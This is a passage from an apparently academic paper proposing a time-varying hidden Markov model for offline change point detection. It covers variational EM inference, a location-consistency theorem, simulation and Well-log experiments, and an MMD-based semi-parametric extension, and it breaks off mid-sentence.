Given the observed $D$-dimensional sequence $Y = \{y_1, \ldots, y_N\}$ with $y_n \in \mathbb{R}^D$, our goal is to detect all $K$ change points $\{\tau_k\}_{k=1}^{K}$ with each $\tau_k \in \{1, \ldots, N\}$ and to estimate the distribution of each regime. There are extensive works with different settings of CPD, such as the piecewise i.i.d assumption (Matteson & James, 2014; Li et al., 2015), the autoregressive assumption (Yamanishi & Takeuchi, 2002), and others (Kawahara et al., 2007). In this work, we illustrate our method using the common piecewise i.i.d setting, such that \( y_n \) is independently sampled from a distribution \( P_k \) for \( \tau_{k-1} \leq n \leq \tau_k \), with \( \tau_0 = 1 \) and \( \tau_{K+1} = N \).

### 2.1 Time-Varying Hidden Markov Model: A Parametric Case

We encode the change point location by a one-hot random variable \( t_k \in \mathbb{R}^N \). Since the \( k \)-th change point should always be no earlier than the \( (k-1) \)-th, the stochastic process \( \{t_1, ..., t_K\} \) is a left-to-right Markov chain with an upper triangular transition matrix. Denoting \( t_k(i) \) as the \( i \)-th element of the vector, the joint distribution of \( \{t_1, ..., t_K\} \) and the transition probability matrix between \( t_{k-1} \) and \( t_k \) are given by:
\[
p(t_1; \Pi_1)\, p(t_2 \mid t_1; \Pi_2) \cdots p(t_K \mid t_{K-1}; \Pi_K) = \prod_{n=1}^{N} \pi_{1,n}^{\, t_1(n)} \prod_{k=2}^{K} \left[ \prod_{m=1}^{N} \prod_{n=1}^{N} \pi_{k,m,n}^{\, t_{k-1}(m)\, t_k(n)} \right],
\]
with \( \Pi_k := \begin{bmatrix} \pi_{k,1,1} & \pi_{k,1,2} & \cdots & \pi_{k,1,N-1} & \pi_{k,1,N} \\ 0 & \pi_{k,2,2} & \cdots & \pi_{k,2,N-1} & \pi_{k,2,N} \\ \vdots & \vdots & \ddots & \vdots & \vdots \\ 0 & 0 & \cdots & \pi_{k,N-1,N-1} & \pi_{k,N-1,N} \\ 0 & 0 & \cdots & 0 & \pi_{k,N,N} \end{bmatrix}, \)
where each element \( \pi_{k,i,j} \) represents the prior probability coefficient that the \( k \)-th regime starts at time step \( i \) and ends at \( j \). Note that previous hidden Markov models (Chib, 1998; Ko et al., 2015) consider a restricted transition matrix whose size is proportional to the state number \( K \). The Markov chain in these methods experiences \( N \)-step transitions along the sequence. On the other hand, our modeling scheme allows the transition probability matrix \( \Pi_k \) to evolve over time and only computes \( K \)-step transitions to improve the inference efficiency. Under the parametric case, the distribution shift between adjacent regimes reduces to a change of parameter values.
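For illustration (our own sketch, not the authors' implementation), a normalized upper-triangular location-transition matrix of this form can be constructed as follows:

```python
import numpy as np

def init_location_transition(N: int, rng=None) -> np.ndarray:
    """Initialize an upper-triangular transition matrix Pi_k over the N
    possible change point locations: Pi[m, n] is the prior probability that
    the k-th regime starts at step m and ends at step n >= m."""
    rng = np.random.default_rng(rng)
    Pi = np.triu(rng.random((N, N)))          # zero below the diagonal
    Pi /= Pi.sum(axis=1, keepdims=True)       # each row is a distribution over n >= m
    return Pi

Pi_k = init_location_transition(N=6, rng=0)
assert np.allclose(np.tril(Pi_k, k=-1), 0.0)  # left-to-right constraint holds
print(np.round(Pi_k, 2))
```

The zero sub-diagonal enforces the left-to-right ordering of the change points, and the M-step updates described later only re-weight the nonzero entries.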
We treat the regime parameters \( (\theta_1, ..., \theta_{K+1}) \) as random variables and introduce \( K + 1 \) prior distributions \( \{p(\theta_k; \alpha_k)\}_{k=1}^{K+1} \), where \( \alpha_k \) denotes all hyperparameters for the \( k \)-th regime. For illustration purposes, we consider the Gaussian likelihood case with mean and precision, where \( \theta_k = \{u_k, \Lambda_k\} \), together with the conjugate normal-Wishart prior. Given the location indicators \( (t_k, t_{k-1}) \), the random variable \( Y_k \) represents the set of observations within the corresponding regime. Under the piecewise i.i.d assumption, the likelihood of the \( k \)-th regime and the prior distributions are given by:
\[
p(Y_k \mid t_k, t_{k-1}, \theta_k) = \prod_{i=1}^{N} \prod_{j=i}^{N} \left[ \prod_{t=i}^{j} N(y_t \mid u_k, \Lambda_k) \right]^{t_{k-1}(i)\, t_k(j)},
\]
\[
u_k \sim N(0, \beta^{-1}I), \quad \Lambda_k \sim W(v_0, V_0),
\]
where \( W(\cdot) \) denotes the Wishart distribution. In our model specification, \( \pi_{k,i,j} \) can be learned directly from data by optimizing with respect to the marginal data likelihood. This probability reflects the relevance of the time interval \([i, j]\) to the true regime \([\tau_{k-1}, \tau_k]\). A similar idea has been applied in hyperparameter learning for Gaussian processes (Rasmussen et al., 2006). In our model, since the value of \( K \) is unknown in practice, automatic model selection can be performed by learning these probabilities for each \( t_k \). If a corresponding diagonal element \( \pi_{k,i,i} \) converges to 1, indicating that the time length of the \( k \)-th regime is zero, then the unnecessary change point can be removed from the model specification. In Section 3.1, we visualize the converged \( \Pi_k \) from numerical simulations and illustrate that all significant spots concentrate on the true locations and the diagonal.

### 2.2 Inference via Variational EM Algorithm

Denoting the set of all latent variables as \( \xi = \{ \{t_k\}_{k=1}^{K}, \{\theta_k\}_{k=1}^{K+1} \} \), TV-HMM detects the locations and the number of change points by inferring the posterior distribution of \( \xi \) and learning the transition probabilities \( \Pi_k \). In the Bayesian literature, Neal (2012) introduces the automatic relevance determination (ARD) procedure for neural network learning. The idea is that optimizing the continuous hyperparameters with respect to the marginal log-likelihood provably leads to consistent model selection and obeys the Occam's razor phenomenon (Ghosal et al., 2008; Yang & Pati, 2017).
Algorithm 1 Variational EM algorithm for Time-Varying Hidden Markov Model
Input: The observed sequence: \( Y \); The initial number of change points: \( \tilde{K} \); Maximum iteration: \( I \); Size of sampling subset: \( S \); Step size: \( \eta \);
Output: Variational distributions \( \{Q(\theta_k)\}_{k=1}^{\tilde{K}+1} \); Marginal probability of CP locations \( \{Q(t_k)\}_{k=1}^{\tilde{K}} \);
1: Initialize the variational expectations of \( \{Q(\theta_k)\}_{k=1}^{\tilde{K}+1} \);
2: for \( 1 \leq i_1 \leq I \) do
3: Randomly sample \( S \) data points and collect the retrospective ordered index set \( \Omega \);
4: E-Step:
5: Update the variational distributions \( \{Q^S(t_k)\}_{k=1}^{\tilde{K}}, \{Q^S(t_k, t_{k-1})\}_{k=2}^{\tilde{K}} \) by Equation 3 based on the sampled \( S \) observations, with
\[
Q^S(t_k(n) = 1 \mid t_{k-1}(m) = 1) = \begin{cases} Q(t_k(n) = 1 \mid t_{k-1}(m) = 1) & \text{if } m, n \in \Omega, \\ 0 & \text{otherwise;} \end{cases}
\]
6: Re-estimate \( \{Q(\theta_k)\}_{k=1}^{\tilde{K}+1} \) using Equation 2 based on the sampled \( S \) observations;
7: M-Step:
8: Set the new prior by \( \pi_{k,m,n} \leftarrow \pi_{k,m,n} + \eta \cdot Q^S(t_k(n) = 1 \mid t_{k-1}(m) = 1) \);
9: end for

However, direct marginal likelihood maximization is intractable since it involves an integral over all latent variables. The EM algorithm provides a solution where we relax the marginal likelihood function with its lower bound. Denoting the hyperparameter sets \( \Pi = \{\Pi_k\}_{k=1}^{K} \) and \( \alpha = \{\alpha_k\}_{k=1}^{K+1} \), we have

E-Step. \( L(\Pi \mid \Pi_{\text{old}}) = E_{\xi|Y;\Pi_{\text{old}},\alpha}[\log p(Y, \xi; \Pi, \alpha)] \),
M-Step. \( \hat{\Pi} = \arg\max_{\Pi} L(\Pi \mid \Pi_{\text{old}}) \).

Although the EM algorithm seems feasible, the E-Step requires evaluating the true posterior \( p(\xi \mid Y; \Pi, \alpha) \), which has no analytical form. Here we further leverage variational approximation and introduce a tractable variational distribution \( Q \) as an approximator of the true posterior under the KL divergence. By maximizing the evidence lower bound (ELBO), we minimize the KL divergence between \( Q \) and the true posterior distribution (Blei et al., 2017). Under the common mean-field assumption, where the variational distributions factorize independently, we obtain explicit solutions for the optimal approximator \( Q^* \):
\[ Q^*(\theta_k) \propto \exp(E_{Q(t_k,t_{k-1})}[\log p(Y_k, t_k, \theta_k | t_{k-1}; \alpha_k, \Pi_k)]) , \]
\[ Q^*(t_1,...,t_K) \propto \prod_{k=1}^{K+1} \exp(E_{Q(\theta_k)}[\ln p(Y_k, t_k, \theta_k | t_{k-1}; \Pi_k, \alpha_k)]) . \]
Note that the solution in Equation 2 is a joint distribution of \( \{t_1,...,t_K\} \). However, the quantities of primary interest for location detection are the marginal distributions \( Q(t_k) \), together with \( Q(t_k, t_{k-1}) \) for inferring \( Q^*(\theta_k) \). To obtain these quantities, we propose a recursive message-passing procedure based on the sum-product algorithm. The marginalization is achieved by passing real-valued message functions between the latent variables \( t_k \), denoted by \( \mu_{\rightarrow t_k}, \mu_{t_k \leftarrow} \in \mathbb{R}^N \).
These two functions represent the information flow that propagates forward and backward from the neighboring variables:
\[
Q(t_k(n) = 1) \propto \mu_{\rightarrow t_k}(n) \cdot \mu_{t_k \leftarrow}(n),
\]
\[
Q(t_{k-1}(m) = 1, t_k(n) = 1) \propto \mu_{\rightarrow t_{k-1}}(m) \cdot \pi_{k,m,n} \cdot \exp(E_{Q(\theta_k)}[\ln p(Y_k \mid \theta_k, t_{k-1}(m) = 1, t_k(n) = 1)]) \cdot \mu_{t_k \leftarrow}(n),
\]
where the recursive formulas of the message passing are given by:
\[
\mu_{\rightarrow t_k}(n) = \sum_{m=1}^{n} \left\{ \mu_{\rightarrow t_{k-1}}(m) \cdot \pi_{k,m,n} \cdot \exp(E_{Q(\theta_k)}[\ln p(Y_k \mid \theta_k, t_{k-1}(m) = 1, t_k(n) = 1)]) \right\},
\]
\[
\mu_{t_{k-1} \leftarrow}(m) = \sum_{n=m}^{N} \left\{ \mu_{t_k \leftarrow}(n) \cdot \pi_{k,m,n} \cdot \exp(E_{Q(\theta_k)}[\ln p(Y_k \mid \theta_k, t_{k-1}(m) = 1, t_k(n) = 1)]) \right\}.
\]
Given the initial messages \( \mu_{\rightarrow t_1} \) and \( \mu_{t_K \leftarrow} \), each message flow can be evaluated iteratively. For the Gaussian example of Equation 1, the detailed expressions of Equations 2 and 3 are given in Appendix B. After updating all variational distributions by taking a one-step coordinate gradient ascent, we optimize the hyperparameters \( \Pi \) in the M-step. By alternating between the E and M steps, we simultaneously detect the change point locations and estimate the parameters of each regime using the maximum a posteriori (MAP) estimates of the variational distributions:
$$\hat{\tau}_k = \arg\max_{\tau_k} Q(t_k(\tau_k) = 1), \quad \hat{\theta}_k = \arg\max_{\theta_k} Q(\theta_k).$$

The computational complexity of each iteration is $O(KN^2)$. When the length of the sequence grows, the convergence speed deteriorates and the memory usage becomes prohibitive. To relieve the computational burden, we randomly sample a subset of observations chronologically in each iteration. The subset has a fixed length $S$, which is much smaller than the number of observations, $S \ll N$. A local estimator built on this subset is established under stochastic approximation, which enjoys lower computational complexity and guarantees convergence to the global optimum (Robbins & Monro, 1951). In our simulations, the proposed procedure usually converges or reaches the predefined iteration limit within 30 iterations. Thus, we reduce the computational cost of each EM step to $O(KS^2)$ and improve the computational efficiency. The complete procedure is summarized in Algorithm 1.

Practically, when the prior knowledge of $K$ is unavailable, it can be learned from the data using ARD. Suppose we initialize our method with a Markov chain $\{t_1, ..., t_{\tilde{K}}\}$ of length $\tilde{K} > K$. As the algorithm progresses, the learned transition matrices $\Pi$ reveal the probability of each location transition, and the estimated locations $\{\hat{\tau}_k\}_{k=1}^{\tilde{K}}$ cluster together. Some of the successive change points gradually converge to the same location, e.g., $\hat{\tau}_{L} = \hat{\tau}_{L+1} = \cdots = \hat{\tau}_{L+l}$ for some integers $L$ and $l$. Therefore, the redundant regimes vanish during the EM iterations, and only $K$ unique locations remain after convergence.
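To make the recursion above concrete, the following is a minimal numerical sketch of the forward-backward pass (our own illustration; the tables `loglik[k]`, holding the expected log-likelihoods $\mathbb{E}_{Q(\theta_k)}[\ln p(Y_k \mid \theta_k, t_{k-1}(m){=}1, t_k(n){=}1)]$, are assumed to be precomputed):

```python
import numpy as np

def forward_backward(Pi, loglik):
    """Sum-product messages for the left-to-right location chain.
    Pi:     list of K upper-triangular (N, N) transition matrices
            (Pi[0] and loglik[0] are unused; t_1 gets a flat initialization here).
    loglik: list of K (N, N) tables of expected log-likelihoods for a regime
            starting at m and ending at n (entries with n < m are irrelevant).
    Returns the normalized marginals Q(t_k(n) = 1) for k = 1..K."""
    K, N = len(Pi), Pi[0].shape[0]
    fwd = [np.ones(N) / N]                      # mu_{-> t_1}
    for k in range(1, K):
        pot = np.triu(Pi[k] * np.exp(loglik[k]))  # pi_{k,m,n} * exp(E[ln p]), m <= n
        fwd.append(pot.T @ fwd[-1])             # sum over m <= n
    bwd = [np.ones(N) for _ in range(K)]        # mu_{t_K <-}
    for k in range(K - 2, -1, -1):
        pot = np.triu(Pi[k + 1] * np.exp(loglik[k + 1]))
        bwd[k] = pot @ bwd[k + 1]               # sum over n >= m
    marg = [f * b for f, b in zip(fwd, bwd)]
    return [m / m.sum() for m in marg]          # normalize each Q(t_k)

# toy run: K = 3 candidate change points over N = 5 locations
rng = np.random.default_rng(0)
N, K = 5, 3
Pi = [np.triu(np.ones((N, N))) / np.arange(N, 0, -1)[:, None] for _ in range(K)]
loglik = [np.triu(rng.normal(size=(N, N))) for _ in range(K)]
for k, q in enumerate(forward_backward(Pi, loglik), 1):
    print(f"Q(t_{k}):", np.round(q, 3))
```

The upper-triangular masking inside the recursion is what enforces the left-to-right ordering of the change points; everything else is the standard sum-product computation.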
2.3 THEORETICAL ANALYSIS

In this section, we provide a statistical analysis of how TV-HMM estimates the change point locations and their number. We list the necessary notations and assumptions under which our theoretical result is established:

A1: For fixed constants $T, K, D$, the underlying sequence on the time interval $[0, T]$ contains $K$ change points $0 < T_1 < \cdots < T_K < T_{K+1} = T$, and the random function $y(t) : \mathbb{R} \rightarrow \mathbb{R}^D$ represents a sample drawn from $\mathcal{N}(y \mid u_k, \Lambda_k)$ if $T_{k-1} < t < T_k$.

A2: For any time interval $[m, n] \subseteq [0, T]$, the number of observations within this interval is of order $O\big(N \frac{n-m}{T}\big)$.

A3: The algorithm initializes $\tilde{K} = M_{K+1} - 1$ change points. Each corresponds to an equal-distance segment $[t_{i-1}, t_i]$, such that $t_i - t_{i-1} = \frac{T}{M_{K+1}}$. We can further categorize $\{t_i\}_{i=1}^{M_{K+1}-1}$ into two subsets:

- Any $t_i$ with $i \in \{M_1, ..., M_K\}$ denotes a junction point, i.e., there is a true change point located within the interval $[t_{i-1}, t_i]$ and $y(t)$ within the interval is not identically distributed.
- For $k = 1, ..., K + 1$, any $t_i$ with $i \in \{M_{k-1} + 1, ..., M_k - 1\}$ denotes a non-junction index, such that every $y(t)$ within the interval comes from the same distribution.

Then we can show that our method leads to provable selection consistency of the change point locations:

**Theorem 1 (Location Consistency).** Assume that assumptions A1-A3 hold. Then the marginal probability $Q(t_i(n) = 1)$ consistently estimates the location of the change point, at a rate that is at most exponential in $N$:

- For non-junction points $t_i$ with $i \in \{M_{k-1} + 1, ..., M_k - 1\}$:
$$Q(t_i(n) = 1) = \begin{cases} 1 & \text{if } n = T_k; \\ O\big(N^{-\frac{|n-T_k|}{T}}\big) & \text{if } n \in [T_{k-1}, T_k); \\ O\big(\exp\big(-N \tfrac{\min\{|n-T_k|,\, |n-T_{k-1}|\}}{T}\big)\big) & \text{if } n \notin [T_{k-1}, T_k]. \end{cases}$$

- For junction points \( t_i \) with \( i \in \{ M_k \}_{k=1}^K \):
\[ Q(t_i(n) = 1) = \begin{cases} 1 & \text{if } n = T_k; \\ O\big(\exp\big(-N \tfrac{|n-T_k|}{T}\big)\big) & \text{otherwise}. \end{cases} \]

**Remark.** Assumption A3 guarantees that each \( Q(\theta_k) \) is initialized using the characteristics (e.g., the mean and variance in the Gaussian case) of the equal-distance segment \([t_{k-1}, t_k]\), which is depicted with a box in Figure 1. Theorem 1 then indicates that these segments determine the convergence rates of the probabilities \( Q(t_k(n)) \); e.g., if a segment contains a true change point \( T_k \), then \( t_k \) is a junction point and \( Q(t_k(n)) \) converges to 1 for \( n = T_k \) at an exponential rate in \( N \). On the other hand, non-junction points whose initial segments are identically distributed with the true regime also converge at a rate up to exponential in \( N \). Thus, as \( N \to \infty \), the MAP estimates \( \{\hat{\tau}_i\}_{i=1}^{M_{K+1}-1} \) become the unduplicated set \( \{T_k\}_{k=1}^K \), and we can drop those segments whose length is 0.

3 SYNTHETIC DATA ANALYSIS

In this section, we evaluate our method on various simulations and real data. We first conduct numerical experiments to provide evidence for our theoretical result. Then we compare the performance of TV-HMM with that of other offline CPD methods on both simulated data and a real-world application. These results show the effectiveness and robustness of our method in terms of location detection and parameter estimation. Throughout the experiments, we evenly divide the sequence into \( \tilde{K} \) segments to fulfill A3 in Section 2.3. Details about the initialization and hyperparameter settings are included in Appendix D.1.
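To make the experimental setting concrete before turning to the results, here is a minimal sketch of generating a piecewise i.i.d. Gaussian sequence with mean-variance shifts (the regime parameters below are arbitrary assumptions, not the values of Appendix D):

```python
import numpy as np

def piecewise_gaussian(N, change_points, means, stds, rng=None):
    """Generate a piecewise i.i.d. Gaussian sequence with mean-variance shifts.
    change_points: sorted interior change point indices, e.g. [250, 500, 750]."""
    rng = np.random.default_rng(rng)
    bounds = [0] + list(change_points) + [N]
    segments = [rng.normal(m, s, hi - lo)
                for lo, hi, m, s in zip(bounds[:-1], bounds[1:], means, stds)]
    return np.concatenate(segments)

# four regimes with shifts in both mean and variance (illustrative values)
y = piecewise_gaussian(N=1000, change_points=[250, 500, 750],
                       means=[0.0, 3.0, 0.0, -2.0], stds=[1.0, 1.0, 2.0, 0.5], rng=0)
print(y.shape)  # (1000,)
```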
#### 3.1 IN-DEPTH ANALYSIS OF THEOREM 1

To analyze the theoretical results with controlled experiments, we consider a normal mean-variance shift model, which is also studied in Yamanishi & Takeuchi (2002) and Matteson & James (2014). The performance of CPD is measured by the mean absolute error (MAE). For true change point locations \( \{l_1, l_2, \ldots\} \) and estimates \( \{\hat{l}_1, \hat{l}_2, \ldots\} \), MAE = \( \frac{1}{N} \sum_j \min_i |\hat{l}_j - l_i| \), i.e., the normalized sum of the absolute distances from each estimated location to its closest true location.

We first investigate the change of the convergence rate by varying the value of \( N \); the results are summarized in Figure 2. The top left plot (a) shows that a small value of \( N \) results in fluctuations of the estimated number of change points; as the number of observations increases, the estimated number remains steady at the true value 4. Similarly, the performance of the parameter estimation is shown in the bottom left plot (b), indicating that the estimation error rapidly decreases as the length of the sequence grows. All the results are repeated 100 times with fixed initialization across all cases and are consistent with Theorem 1. Thus, the convergence rate of the TV-HMM increases with the number of observations.

To illustrate the results of automatic relevance determination, we also visualize \( \pi_{k,i,j} \) before and after convergence, by taking the summation of \( \{\Pi_k\}_{k=1}^{\tilde{K}} \). The results are shown on the right of Figure 2. The top right plot (c) shows the initial upper triangular transition matrix, and the bottom plot (d) is the converged result from Algorithm 1. Note that the converged transition matrix is extremely sparse. The non-zero spots on the diagonal indicate the existence of unnecessary regimes of size 0. The other significant spots are near the true change point locations, indicating the high relevance of these intervals to the true regimes. We then infer \( \{Q(t_k)\}_{k=1}^{K} \) for automatic model selection by leveraging the converged \( \{\Pi_k\}_{k=1}^{\tilde{K}} \) as prior distributions.

Figure 2: Left: The line plot (a) of the average estimated number of change points and the boxplot (b) of MAE varying with sequence length; Right: The heatmap of the sum of the initial (c) and converged (d) $\tilde{K}$ transition matrices $[\Pi_1, ..., \Pi_{\tilde{K}}]$.

3.2 Evaluation on Simulated Data

The effectiveness of our method is demonstrated by comparison with several well-developed CPD methods, including WBSLSW (Korkas & Fryzlewicz, 2017), ECP3O (Zhang et al., 2017), KCP (Harchaoui & Cappé, 2007), $D_m$-BOCD (Altamirano et al., 2023), and another HMM-based method, DPHMM (Ko et al., 2015). The performance of CPD is measured by the Rand index, which quantifies the similarity between two data partitions (Lajugie et al., 2014; Fleming et al., 2023). It produces a value between 0 and 1, where 1 indicates perfect agreement. We consider three change-point models for the simulation, each with a distinct characteristic (Matteson & James, 2014; Chang et al., 2019). For Model 1, each regime follows either a binomial, Poisson, or normal distribution, with corresponding parameter variations. For Model 2, sequences are generated from 5-dimensional normal distributions, with either mean or covariance matrix shifts, and Model 3 increases the dimension to 10. Our simulations cover all common regime shifts in the piecewise i.i.d setting; both evaluation criteria used here can be computed as in the sketch below.
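For concreteness, the two evaluation criteria used in this section, the MAE of Section 3.1 and the Rand index, can be computed as follows (our own minimal implementation):

```python
import numpy as np

def cp_mae(est, true, N):
    """MAE of Section 3.1: the normalized sum of distances from each estimated
    change point to its closest true change point."""
    est, true = np.asarray(est), np.asarray(true)
    return np.abs(est[:, None] - true[None, :]).min(axis=1).sum() / N

def rand_index(cps_a, cps_b, N):
    """Rand index between the segmentations induced by two change point sets:
    the fraction of observation pairs on which the two partitions agree."""
    def labels(cps):
        lab = np.zeros(N, dtype=int)
        for c in cps:
            lab[c:] += 1              # a new regime starts at each change point
        return lab
    la, lb = labels(cps_a), labels(cps_b)
    iu = np.triu_indices(N, k=1)      # all unordered pairs i < j
    same_a = (la[:, None] == la[None, :])[iu]
    same_b = (lb[:, None] == lb[None, :])[iu]
    return (same_a == same_b).mean()

print(cp_mae([248, 497, 761], [250, 500, 750], N=1000))      # 0.016
print(rand_index([248, 497, 761], [250, 500, 750], N=1000))  # close to 1
```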
For more details about the simulation setups, please refer to Appendix D.3. Table 1 shows the performance of all methods in all cases. For Model 1, the accuracy of our method is in line with DPHMM and outperforms the other four methods. Our method is the best among all candidate methods for Model 2. For Model 3, our method is also comparable to the best method, ECP3O. The results indicate that our method performs consistently across all three models, while the existing methods suffer from fluctuations in performance.

| Method | Model 1 | Model 2 | Model 3 |
|------------|---------|---------|---------|
| WBSLSW | 0.9068 | 0.3596 | 0.3849 |
| ECP3O | 0.9156 | 0.9580 | 0.9737 |
| DPHMM | **0.9637** | 0.8727 | 0.8869 |
| KCP | 0.9501 | 0.8436 | 0.8836 |
| $D_m$-BOCD | 0.8123 | 0.8411 | 0.8413 |
| TV-HMM | 0.9523 | **0.9756** | 0.9615 |

Table 1: The performance of different CPD methods measured by the Rand index.

| Parameter | D=1 | D=5 | D=10 |
|-----------|-------|-------|-------|
| MSE($\hat{u}$), Mean | 0.1885 | 0.1286 | 0.1868 |
| MSE($\hat{u}$), SD | ± 0.1635 | ± 0.0625 | ± 0.0971 |
| MSE($\hat{\Lambda}$), Mean | 0.9593 | 1.3382 | 4.1460 |
| MSE($\hat{\Lambda}$), SD | ± 1.7317 | ± 0.5381 | ± 0.1345 |

Table 2: MSE of the estimated posterior parameters $u$ and $\Lambda$.

The proposed TV-HMM is able to simultaneously estimate the characteristics of each estimated regime, which are the mean and precision in Equation 1. We test the proposed method under different data dimensions. The parameter estimation is measured by the mean squared error (MSE). We summarize the results in Table 2. Our method provides promising estimation results, since the MSE between the estimated posterior mean (\(\hat{u}\)) and the ground truth (\(u\)) falls within the range of 0.1 to 0.2 in all cases. For the posterior precision (\(\hat{\Lambda}\)) estimation, the MSE is relatively larger than in the other cases, which is reasonable since the number of parameters grows substantially with the dimension \(D\). Furthermore, the small standard deviation (SD) of the MSE indicates the stability of our estimation across all setups.

3.3 Evaluation on Real-world Dataset

The robustness of our method is evaluated on the Well-log dataset from a real-world application. The data contain 4050 nuclear magnetic resonance measurements taken during drilling procedures (Ó Ruanaidh & Fitzgerald, 2012). Note that this sequence is corrupted by outliers, which have a significant effect on change point detection. To tackle this problem, Altamirano et al. (2023) develop $D_m$-BOCD, which incorporates diffusion score matching to reduce the effect of outliers on change point detection. This adaptation allows $D_m$-BOCD to work on the corrupted dataset. Therefore, we compare the estimated locations of TV-HMM with their results; the comparison is shown in Figure 3. Each detected regime is separately colored, indicating the existence of a distributional shift. Most of the outliers are not identified as change points, and the results of TV-HMM are essentially in line with those of Altamirano et al. (2023), which are plotted in a color bar at the bottom. The grey band indicates a mismatch of the detected regimes. There is a clear change point at time stamp 1540 that is not identifiable using \(D_m\)-BOCD. Therefore, our method exhibits a comparative advantage on the Well-log dataset and demonstrates robustness to outliers.
Figure 3: Estimated change point locations for the Well-log data; color band (1) represents the estimated regimes from TV-HMM, and (2) represents the estimated regimes from \(D_m\)-BOCD. The grey bands represent the mismatches between the two methods.

4 Extension of TV-HMM with Maximum Mean Discrepancy

The previous results are developed based on a parametric likelihood function. Here, we alleviate this assumption using a kernel approach and propose the semi-parametric TV-HMM, which is robust against outliers and model misspecification. Our motivation is that the expected log-likelihood term in the message function can be regarded as a distance measure between the observation subset \(Y_k\) and the characteristics \(\zeta_k\) of the \(k\)-th regime. Thus, we can generalize the message functions of Equation 3 using the Maximum Mean Discrepancy (MMD):
\[
\mu_{\rightarrow t_k}(n) = \sum_{m=1}^{n} \left\{ \mu_{\rightarrow t_{k-1}}(m) \cdot \pi_{k,m,n} \cdot \exp\left[ -\frac{n-m+1}{G} \left\| \mathbb{E}_{\hat{P}_m^n}[\varphi(y)] - \mathbb{E}_{Q(\zeta_k)}[\varphi(\zeta_k)] \right\|_H \right] \right\},
\]
\[
\mu_{t_{k-1} \leftarrow}(m) = \sum_{n=m}^{N} \left\{ \mu_{t_k \leftarrow}(n) \cdot \pi_{k,m,n} \cdot \exp\left[ -\frac{n-m+1}{G} \left\| \mathbb{E}_{\hat{P}_m^n}[\varphi(y)] - \mathbb{E}_{Q(\zeta_k)}[\varphi(\zeta_k)] \right\|_H \right] \right\},
\]
where \(\hat{P}_m^n\) denotes the empirical distribution of the \(n-m+1\) successive observations from time index \(m\) to \(n\), \(\varphi : \mathbb{R}^D \rightarrow H\) represents the mapping into the reproducing kernel Hilbert space \(H\), and \(G\) is a constant that adjusts the scale of the MMD.

Algorithm 2 Training Procedure for Semi-Parametric Time-Varying Hidden Markov Model
Input: Observed sequence $Y$; Initial number of change points $\tilde{K}$; Maximum iteration $I$; Step size $\eta$; Number of posterior samples $S$;
Output: Variational distributions $\{Q_\Phi(\zeta_k)\}_{k=1}^{K+1}$; Marginal probability of change point locations $\{Q(t_k)\}_{k=1}^{K}$;
1: Initialize $\{Q_\Phi(\zeta_k)\}_{k=1}^{K+1}$ with the distributions of the initial regimes;
2: for $1 \leq i \leq I$ do
3: for $1 \leq k \leq K + 1$ do
4: Sample $\{\zeta_k^{s}\}_{s=1}^{S} \sim Q_\Phi(\zeta_k)$; compute $\|\mathbb{E}_{\hat{P}_m^n}[\varphi(y)] - \frac{1}{S}\sum_{s=1}^{S}\varphi(\zeta_k^{s})\|_H$ for all $1 \leq m \leq n \leq N$;
5: end for
6: Update $\{Q^i_k(n,m)\}_{k=2}^{K}$ using the message functions of Equation 4; $\pi_{k,m,n} \leftarrow \pi_{k,m,n} + \eta \cdot Q^i_k(n,m)$;
7: Compute $\mathcal{J} \leftarrow$ MMD-ELBO (see below); update $\Phi \leftarrow \Phi + \eta \cdot \frac{\partial \mathcal{J}}{\partial \Phi}$;
8: end for

Unlike Equation 2 in the parametric model, where $Q(\theta)$ must be derived using variational inference, $Q(\zeta)$ can be modeled generally using non-parametric density estimation (Botev et al., 2010) or deep generative models (Kingma & Welling, 2013; Rezende et al., 2014). Denoting the distribution of $\zeta$ as $Q_\Phi(\zeta)$, where $\Phi$ denotes the model parameters, e.g., the weights of a neural network, we propose a new MMD-based evidence lower bound (MMD-ELBO) as the objective function for learning $\Phi$. The new loss function improves robustness by replacing the likelihood functions in the original ELBO with a kernel-embedded distance.
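Before stating the objective: in practice the population MMD terms above are estimated from samples. A minimal sketch of such an empirical estimate with an RBF kernel (our own assumption; the paper leaves the feature map $\varphi$ generic) is:

```python
import numpy as np

def rbf(a, b, gamma=1.0):
    """RBF kernel matrix k(a_i, b_j) = exp(-gamma * ||a_i - b_j||^2)."""
    d2 = ((a[:, None, :] - b[None, :, :]) ** 2).sum(-1)
    return np.exp(-gamma * d2)

def mmd(Y_seg, Z_samples, gamma=1.0):
    """Empirical (biased) MMD between a segment Y_seg = {y_m, ..., y_n} and
    samples Z_samples drawn from Q_Phi(zeta_k)."""
    kyy = rbf(Y_seg, Y_seg, gamma).mean()
    kzz = rbf(Z_samples, Z_samples, gamma).mean()
    kyz = rbf(Y_seg, Z_samples, gamma).mean()
    return np.sqrt(max(kyy + kzz - 2 * kyz, 0.0))

rng = np.random.default_rng(0)
seg = rng.normal(0.0, 1.0, (50, 2))        # observations in one candidate regime
samp = rng.normal(3.0, 1.0, (100, 2))      # posterior samples for zeta_k
print(mmd(seg, samp))                      # large: segment does not match the regime
```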
The formula of the MMD-ELBO is given by:
$$\mathcal{J} = \sum_{k=1}^{K+1} \left\{ \sum_{m=1}^{N} \sum_{n \geq m} \frac{m-n-1}{G} \cdot Q^i_k(n,m) \left\| \mathbb{E}_{\hat{P}_m^n}[\varphi(y)] - \mathbb{E}_{Q_\Phi(\zeta_k)}[\varphi(\zeta_k)] \right\|_H - \text{KL}\big(Q_\Phi(\zeta_k)\,\|\,p(\zeta_k)\big) \right\},$$
where $Q^i_k(n,m)$ denotes the joint variational probability that $t_k(n) = 1$ and $t_{k-1}(m) = 1$, obtained from the MMD-based message passing of Equation 4. In each iteration, we can evaluate the value of the MMD-ELBO by sampling from $Q_\Phi(\zeta_k)$ and update $\Phi$ using the re-parameterization trick (Kingma et al., 2015). The pseudo-code for semi-parametric change point detection is summarized in Algorithm 2.

We illustrate the performance of the semi-parametric TV-HMM through three non-Gaussian examples, where the underlying sequences are generated from Poisson, chi-squared, and exponential distributions, respectively. The setup of the simulations can be found in Appendix D.4. Our performance is promising in all cases in terms of the Rand index, which is 0.9447 for the Poisson, 0.8686 for the chi-squared, and 0.8911 for the exponential distribution. Note that we do not incorporate any distributional knowledge as a prior; the results indicate that our method has robust performance over a broader class of data distributions.

Relation with Parametric TV-HMM: We illustrate the relation of the semi-parametric model to the previously discussed parametric TV-HMM. Under the Gaussian assumption with fixed variance, the likelihood term $\mathbb{E}_{Q(\theta_k)}[\ln p(Y_k | \theta_k, t_{k-1} = m, t_k = n)]$ in the message passing of Equation 3 is proportional to:
